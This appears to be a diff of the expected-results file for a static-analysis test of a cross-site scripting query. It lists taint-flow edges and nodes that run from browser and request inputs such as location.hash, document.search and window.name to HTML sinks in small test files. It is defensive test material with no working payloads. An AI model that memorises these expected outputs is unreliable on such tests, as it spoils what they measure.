.search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... 
bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... 
.search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | 
@@ -1207,261 +791,677 @@ edges | winjs.js:2:17:2:40 | documen ... .search | winjs.js:2:17:2:53 | documen ... ring(1) | provenance | | | winjs.js:2:17:2:40 | documen ... .search | winjs.js:2:17:2:53 | documen ... ring(1) | provenance | Config | | winjs.js:2:17:2:53 | documen ... ring(1) | winjs.js:2:7:2:53 | tainted | provenance | | +nodes +| addEventListener.js:1:43:1:47 | event | semmle.label | event | +| addEventListener.js:2:20:2:24 | event | semmle.label | event | +| addEventListener.js:2:20:2:29 | event.data | semmle.label | event.data | +| addEventListener.js:5:43:5:48 | data | semmle.label | data | +| addEventListener.js:5:43:5:48 | {data} | semmle.label | {data} | +| addEventListener.js:6:20:6:23 | data | semmle.label | data | +| addEventListener.js:10:21:10:25 | event | semmle.label | event | +| addEventListener.js:12:24:12:28 | event | semmle.label | event | +| addEventListener.js:12:24:12:33 | event.data | semmle.label | event.data | +| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | semmle.label | \\u0275getDOM ... ().href | +| angular2-client.ts:26:44:26:69 | this.ro ... .params | semmle.label | this.ro ... .params | +| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:27:44:27:74 | this.ro ... yParams | semmle.label | this.ro ... yParams | +| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:28:44:28:71 | this.ro ... ragment | semmle.label | this.ro ... ragment | +| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | +| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | +| angular2-client.ts:32:46:32:59 | map.get('foo') | semmle.label | map.get('foo') | +| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | semmle.label | this.ro ... 1].path | +| angular2-client.ts:36:44:36:80 | this.ro ... ameters | semmle.label | this.ro ... 
ameters | +| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | semmle.label | this.ro ... eters.x | +| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | semmle.label | this.ro ... et('x') | +| angular2-client.ts:38:44:38:89 | this.ro ... .params | semmle.label | this.ro ... .params | +| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | semmle.label | this.ro ... arams.x | +| angular2-client.ts:40:44:40:58 | this.router.url | semmle.label | this.router.url | +| angular2-client.ts:42:45:42:59 | this.router.url | semmle.label | this.router.url | +| angular2-client.ts:43:75:43:105 | this.ro ... yParams | semmle.label | this.ro ... yParams | +| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | semmle.label | routeSn ... ('foo') | +| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | semmle.label | Cookie.get("unsafe") | +| angular-tempate-url.js:13:30:13:31 | ev | semmle.label | ev | +| angular-tempate-url.js:14:26:14:27 | ev | semmle.label | ev | +| angular-tempate-url.js:14:26:14:32 | ev.data | semmle.label | ev.data | +| classnames.js:7:31:7:84 | `` | semmle.label | `` | +| classnames.js:7:47:7:69 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:7:58:7:68 | window.name | semmle.label | window.name | +| classnames.js:8:31:8:85 | `` | semmle.label | `` | +| classnames.js:8:47:8:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:8:59:8:69 | window.name | semmle.label | window.name | +| classnames.js:9:31:9:85 | `` | semmle.label | `` | +| classnames.js:9:47:9:70 | classNa ... w.name) | semmle.label | classNa ... 
w.name) | +| classnames.js:9:59:9:69 | window.name | semmle.label | window.name | +| classnames.js:10:45:10:55 | window.name | semmle.label | window.name | +| classnames.js:11:31:11:79 | `` | semmle.label | `` | +| classnames.js:11:47:11:64 | unsafeStyle('foo') | semmle.label | unsafeStyle('foo') | +| classnames.js:13:31:13:83 | `` | semmle.label | `` | +| classnames.js:13:47:13:68 | safeSty ... w.name) | semmle.label | safeSty ... w.name) | +| classnames.js:13:57:13:67 | window.name | semmle.label | window.name | +| classnames.js:15:31:15:78 | `` | semmle.label | `` | +| classnames.js:15:47:15:63 | clsx(window.name) | semmle.label | clsx(window.name) | +| classnames.js:15:52:15:62 | window.name | semmle.label | window.name | +| classnames.js:17:32:17:79 | `` | semmle.label | `` | +| classnames.js:17:48:17:64 | clsx(window.name) | semmle.label | clsx(window.name) | +| classnames.js:17:53:17:63 | window.name | semmle.label | window.name | +| clipboard.ts:8:11:8:51 | html | semmle.label | html | +| clipboard.ts:8:18:8:51 | clipboa ... /html') | semmle.label | clipboa ... /html') | +| clipboard.ts:15:25:15:28 | html | semmle.label | html | +| clipboard.ts:24:23:24:58 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:29:19:29:54 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:33:19:33:68 | e.origi ... /html') | semmle.label | e.origi ... /html') | +| clipboard.ts:43:15:43:55 | html | semmle.label | html | +| clipboard.ts:43:22:43:55 | clipboa ... /html') | semmle.label | clipboa ... /html') | +| clipboard.ts:50:29:50:32 | html | semmle.label | html | +| clipboard.ts:71:13:71:62 | droppedHtml | semmle.label | droppedHtml | +| clipboard.ts:71:27:71:62 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | +| clipboard.ts:98:15:98:54 | html | semmle.label | html | +| clipboard.ts:98:22:98:54 | dataTra ... 
/html') | semmle.label | dataTra ... /html') | +| clipboard.ts:99:23:99:26 | html | semmle.label | html | +| custom-element.js:5:26:5:36 | window.name | semmle.label | window.name | +| d3.js:4:12:4:22 | window.name | semmle.label | window.name | +| d3.js:11:15:11:24 | getTaint() | semmle.label | getTaint() | +| d3.js:12:20:12:29 | getTaint() | semmle.label | getTaint() | +| d3.js:14:20:14:29 | getTaint() | semmle.label | getTaint() | +| d3.js:21:15:21:24 | getTaint() | semmle.label | getTaint() | +| dates.js:9:9:9:69 | taint | semmle.label | taint | +| dates.js:9:17:9:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:9:36:9:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:9:36:9:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:11:31:11:70 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:11:42:11:68 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:11:63:11:67 | taint | semmle.label | taint | +| dates.js:12:31:12:73 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:12:42:12:71 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:12:66:12:70 | taint | semmle.label | taint | +| dates.js:13:31:13:72 | `Time i ... time)}` | semmle.label | `Time i ... time)}` | +| dates.js:13:42:13:70 | dateFns ... )(time) | semmle.label | dateFns ... )(time) | +| dates.js:13:59:13:63 | taint | semmle.label | taint | +| dates.js:16:31:16:69 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:16:42:16:67 | moment( ... (taint) | semmle.label | moment( ... (taint) | +| dates.js:16:62:16:66 | taint | semmle.label | taint | +| dates.js:18:31:18:66 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:18:42:18:64 | datefor ... taint) | semmle.label | datefor ... taint) | +| dates.js:18:59:18:63 | taint | semmle.label | taint | +| dates.js:21:31:21:68 | `Time i ... 
aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:21:42:21:66 | dayjs(t ... (taint) | semmle.label | dayjs(t ... (taint) | +| dates.js:21:61:21:65 | taint | semmle.label | taint | +| dates.js:30:9:30:69 | taint | semmle.label | taint | +| dates.js:30:17:30:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:30:36:30:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:30:36:30:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:37:31:37:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:37:42:37:82 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:37:77:37:81 | taint | semmle.label | taint | +| dates.js:38:31:38:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:38:42:38:82 | luxon.f ... taint) | semmle.label | luxon.f ... taint) | +| dates.js:38:77:38:81 | taint | semmle.label | taint | +| dates.js:39:31:39:86 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:39:42:39:84 | moment. ... taint) | semmle.label | moment. ... taint) | +| dates.js:39:79:39:83 | taint | semmle.label | taint | +| dates.js:40:31:40:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:40:42:40:82 | dayjs.f ... taint) | semmle.label | dayjs.f ... taint) | +| dates.js:40:77:40:81 | taint | semmle.label | taint | +| dates.js:46:9:46:69 | taint | semmle.label | taint | +| dates.js:46:17:46:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:46:36:46:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:46:36:46:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:48:31:48:90 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:48:42:48:88 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | +| dates.js:48:83:48:87 | taint | semmle.label | taint | +| dates.js:49:31:49:89 | `Time i ... 
aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:49:42:49:87 | new Dat ... (taint) | semmle.label | new Dat ... (taint) | +| dates.js:49:82:49:86 | taint | semmle.label | taint | +| dates.js:50:31:50:104 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:50:42:50:102 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | +| dates.js:50:97:50:101 | taint | semmle.label | taint | +| dates.js:54:9:54:69 | taint | semmle.label | taint | +| dates.js:54:17:54:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:54:36:54:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:54:36:54:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:57:31:57:101 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:57:42:57:99 | moment. ... (taint) | semmle.label | moment. ... (taint) | +| dates.js:57:94:57:98 | taint | semmle.label | taint | +| dates.js:59:31:59:87 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:59:42:59:85 | luxon.e ... (taint) | semmle.label | luxon.e ... (taint) | +| dates.js:59:80:59:84 | taint | semmle.label | taint | +| dates.js:61:31:61:88 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:61:42:61:86 | dayjs.s ... (taint) | semmle.label | dayjs.s ... (taint) | +| dates.js:61:81:61:85 | taint | semmle.label | taint | +| dragAndDrop.ts:8:11:8:50 | html | semmle.label | html | +| dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| dragAndDrop.ts:15:25:15:28 | html | semmle.label | html | +| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | semmle.label | e.origi ... 
/html') | +| dragAndDrop.ts:43:15:43:54 | html | semmle.label | html | +| dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| dragAndDrop.ts:50:29:50:32 | html | semmle.label | html | +| dragAndDrop.ts:71:13:71:61 | droppedHtml | semmle.label | droppedHtml | +| dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | +| event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | +| event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| jquery.js:2:7:2:40 | tainted | semmle.label | tainted | +| jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | +| jquery.js:4:5:4:11 | tainted | semmle.label | tainted | +| jquery.js:5:13:5:19 | tainted | semmle.label | tainted | +| jquery.js:6:11:6:17 | tainted | semmle.label | tainted | +| jquery.js:7:5:7:34 | "
    " | semmle.label | "
    " | +| jquery.js:7:20:7:26 | tainted | semmle.label | tainted | +| jquery.js:8:18:8:34 | "XSS: " + tainted | semmle.label | "XSS: " + tainted | +| jquery.js:8:28:8:34 | tainted | semmle.label | tainted | +| jquery.js:10:5:10:40 | "" + ... "" | semmle.label | "" + ... "" | +| jquery.js:10:13:10:20 | location | semmle.label | location | +| jquery.js:10:13:10:31 | location.toString() | semmle.label | location.toString() | +| jquery.js:14:19:14:58 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| jquery.js:14:38:14:57 | window.location.hash | semmle.label | window.location.hash | +| jquery.js:15:19:15:60 | decodeU ... search) | semmle.label | decodeU ... search) | +| jquery.js:15:38:15:59 | window. ... .search | semmle.label | window. ... .search | +| jquery.js:16:19:16:64 | decodeU ... ring()) | semmle.label | decodeU ... ring()) | +| jquery.js:16:38:16:52 | window.location | semmle.label | window.location | +| jquery.js:16:38:16:63 | window. ... tring() | semmle.label | window. ... tring() | +| jquery.js:18:7:18:33 | hash | semmle.label | hash | +| jquery.js:18:14:18:33 | window.location.hash | semmle.label | window.location.hash | +| jquery.js:21:5:21:8 | hash | semmle.label | hash | +| jquery.js:21:5:21:21 | hash.substring(1) | semmle.label | hash.substring(1) | +| jquery.js:22:5:22:8 | hash | semmle.label | hash | +| jquery.js:22:5:22:25 | hash.su ... (1, 10) | semmle.label | hash.su ... (1, 10) | +| jquery.js:23:5:23:8 | hash | semmle.label | hash | +| jquery.js:23:5:23:18 | hash.substr(1) | semmle.label | hash.substr(1) | +| jquery.js:24:5:24:8 | hash | semmle.label | hash | +| jquery.js:24:5:24:17 | hash.slice(1) | semmle.label | hash.slice(1) | +| jquery.js:27:5:27:8 | hash | semmle.label | hash | +| jquery.js:27:5:27:25 | hash.re ... #', '') | semmle.label | hash.re ... #', '') | +| jquery.js:28:5:28:26 | window. ... .search | semmle.label | window. ... .search | +| jquery.js:28:5:28:43 | window. ... ?', '') | semmle.label | window. ... 
?', '') | +| jquery.js:34:5:34:25 | '' + ... '' | semmle.label | '' + ... '' | +| jquery.js:34:13:34:16 | hash | semmle.label | hash | +| jquery.js:36:25:36:31 | tainted | semmle.label | tainted | +| jquery.js:37:25:37:37 | () => tainted | semmle.label | () => tainted | +| jquery.js:37:31:37:37 | tainted | semmle.label | tainted | +| json-stringify.jsx:5:9:5:36 | locale | semmle.label | locale | +| json-stringify.jsx:5:18:5:36 | req.param("locale") | semmle.label | req.param("locale") | +| json-stringify.jsx:11:51:11:56 | locale | semmle.label | locale | +| json-stringify.jsx:19:56:19:61 | locale | semmle.label | locale | +| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | semmle.label | JSON.st ... locale) | +| json-stringify.jsx:31:55:31:60 | locale | semmle.label | locale | +| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | semmle.label | JSON.st ... jsonLD) | +| jwt-server.js:7:9:7:35 | taint | semmle.label | taint | +| jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| jwt-server.js:9:16:9:20 | taint | semmle.label | taint | +| jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | +| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | +| nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | +| optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | +| optionalSanitizer.js:2:16:2:39 | documen ... .search | semmle.label | documen ... 
.search | +| optionalSanitizer.js:6:18:6:23 | target | semmle.label | target | +| optionalSanitizer.js:8:7:8:22 | tainted | semmle.label | tainted | +| optionalSanitizer.js:8:17:8:22 | target | semmle.label | target | +| optionalSanitizer.js:9:18:9:24 | tainted | semmle.label | tainted | +| optionalSanitizer.js:15:9:15:14 | target | semmle.label | target | +| optionalSanitizer.js:16:18:16:18 | x | semmle.label | x | +| optionalSanitizer.js:17:20:17:20 | x | semmle.label | x | +| optionalSanitizer.js:26:7:26:39 | target | semmle.label | target | +| optionalSanitizer.js:26:16:26:39 | documen ... .search | semmle.label | documen ... .search | +| optionalSanitizer.js:28:24:28:24 | x | semmle.label | x | +| optionalSanitizer.js:29:12:29:12 | x | semmle.label | x | +| optionalSanitizer.js:31:7:31:23 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:31:18:31:23 | target | semmle.label | target | +| optionalSanitizer.js:32:18:32:25 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:34:5:34:36 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | semmle.label | sanitiz ... inted2) | +| optionalSanitizer.js:34:28:34:35 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:36:18:36:25 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:38:7:38:23 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:38:18:38:23 | target | semmle.label | target | +| optionalSanitizer.js:39:18:39:25 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:41:5:41:36 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | semmle.label | sanitiz ... inted3) | +| optionalSanitizer.js:41:28:41:35 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:43:18:43:25 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | semmle.label | sanitiz ... 
target | +| optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | semmle.label | sanitizeBad(target) | +| optionalSanitizer.js:45:41:45:46 | target | semmle.label | target | +| optionalSanitizer.js:45:51:45:56 | target | semmle.label | target | +| pages/[id].jsx:3:30:3:35 | params [id] | semmle.label | params [id] | +| pages/[id].jsx:3:30:3:35 | params [q] | semmle.label | params [q] | +| pages/[id].jsx:5:9:5:14 | { id } | semmle.label | { id } | +| pages/[id].jsx:5:9:5:29 | id | semmle.label | id | +| pages/[id].jsx:5:18:5:29 | router.query | semmle.label | router.query | +| pages/[id].jsx:10:44:10:45 | id | semmle.label | id | +| pages/[id].jsx:13:44:13:49 | params [id] | semmle.label | params [id] | +| pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | +| pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | +| pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | semmle.label | {\\n ... e\\n } [id] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | semmle.label | {\\n ... e\\n } [q] | +| pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | +| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | +| pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | +| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | semmle.label | context ... 
r \|\| "" | +| react-native.js:7:7:7:33 | tainted | semmle.label | tainted | +| react-native.js:7:17:7:33 | req.param("code") | semmle.label | req.param("code") | +| react-native.js:8:18:8:24 | tainted | semmle.label | tainted | +| react-native.js:9:27:9:33 | tainted | semmle.label | tainted | +| react-use-context.js:10:22:10:32 | window.name | semmle.label | window.name | +| react-use-context.js:16:26:16:36 | window.name | semmle.label | window.name | +| react-use-router.js:8:21:8:32 | router.query | semmle.label | router.query | +| react-use-router.js:8:21:8:39 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:11:24:11:35 | router.query | semmle.label | router.query | +| react-use-router.js:11:24:11:42 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:23:43:23:54 | router.query | semmle.label | router.query | +| react-use-router.js:23:43:23:61 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:33:21:33:32 | router.query | semmle.label | router.query | +| react-use-router.js:33:21:33:39 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-state.js:4:9:4:49 | state | semmle.label | state | +| react-use-state.js:4:38:4:48 | window.name | semmle.label | window.name | +| react-use-state.js:5:51:5:55 | state | semmle.label | state | +| react-use-state.js:9:9:9:43 | state | semmle.label | state | +| react-use-state.js:10:14:10:24 | window.name | semmle.label | window.name | +| react-use-state.js:11:51:11:55 | state | semmle.label | state | +| react-use-state.js:15:9:15:43 | state | semmle.label | state | +| react-use-state.js:15:10:15:14 | state | semmle.label | state | +| react-use-state.js:16:20:16:30 | window.name | semmle.label | window.name | +| react-use-state.js:17:51:17:55 | state | semmle.label | state | +| react-use-state.js:21:10:21:14 | state | semmle.label | state | +| react-use-state.js:22:14:22:17 | prev | semmle.label | prev | +| 
react-use-state.js:23:35:23:38 | prev | semmle.label | prev | +| react-use-state.js:25:20:25:30 | window.name | semmle.label | window.name | +| sanitiser.js:16:7:16:27 | tainted | semmle.label | tainted | +| sanitiser.js:16:17:16:27 | window.name | semmle.label | window.name | +| sanitiser.js:23:21:23:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:23:29:23:35 | tainted | semmle.label | tainted | +| sanitiser.js:30:21:30:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:30:29:30:35 | tainted | semmle.label | tainted | +| sanitiser.js:33:21:33:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:33:29:33:35 | tainted | semmle.label | tainted | +| sanitiser.js:38:21:38:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:38:29:38:35 | tainted | semmle.label | tainted | +| sanitiser.js:45:21:45:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:45:29:45:35 | tainted | semmle.label | tainted | +| sanitiser.js:48:19:48:25 | tainted | semmle.label | tainted | +| sanitiser.js:48:19:48:46 | tainted ... /g, '') | semmle.label | tainted ... /g, '') | +| stored-xss.js:2:39:2:62 | documen ... .search | semmle.label | documen ... .search | +| stored-xss.js:3:35:3:58 | documen ... .search | semmle.label | documen ... .search | +| stored-xss.js:5:20:5:52 | session ... ssion') | semmle.label | session ... ssion') | +| stored-xss.js:8:20:8:48 | localSt ... local') | semmle.label | localSt ... local') | +| stored-xss.js:10:9:10:44 | href | semmle.label | href | +| stored-xss.js:10:16:10:44 | localSt ... local') | semmle.label | localSt ... local') | +| stored-xss.js:12:20:12:54 | "" | semmle.label | "" | +| stored-xss.js:12:35:12:38 | href | semmle.label | href | +| string-manipulations.js:3:16:3:32 | document.location | semmle.label | document.location | +| string-manipulations.js:4:16:4:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:5:16:5:37 | documen ... 
on.href | semmle.label | documen ... on.href | +| string-manipulations.js:5:16:5:47 | documen ... lueOf() | semmle.label | documen ... lueOf() | +| string-manipulations.js:6:16:6:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:6:16:6:43 | documen ... f.sup() | semmle.label | documen ... f.sup() | +| string-manipulations.js:7:16:7:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:7:16:7:51 | documen ... rCase() | semmle.label | documen ... rCase() | +| string-manipulations.js:8:16:8:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:8:16:8:48 | documen ... mLeft() | semmle.label | documen ... mLeft() | +| string-manipulations.js:9:16:9:58 | String. ... n.href) | semmle.label | String. ... n.href) | +| string-manipulations.js:9:36:9:57 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:10:16:10:45 | String( ... n.href) | 